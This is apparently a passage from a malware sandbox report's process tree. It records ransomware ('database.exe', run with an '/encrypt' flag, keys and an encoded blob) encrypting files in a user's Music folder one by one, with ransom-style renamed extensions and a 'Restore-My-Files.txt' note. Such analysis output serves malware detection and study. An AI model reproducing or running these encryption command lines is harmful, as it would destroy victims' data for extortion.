                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\RegisterSync.mpg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\RemoveDismount.i64.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResetDebug.iso.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResetSkip.mov.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResolveMerge.search-ms.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\ResumeUpdate.rle.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SendCompress.ppsm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\StopMeasure.xlsb.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendLimit.temp.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendSelect.cab.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\SuspendUpdate.pub.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\TracePing.potm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\TraceSwitch.eps.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UnblockClose.odp.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UnprotectWait.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\UpdateExport.mpa.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\xY3tbcbQ-SrCNfD0Q.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
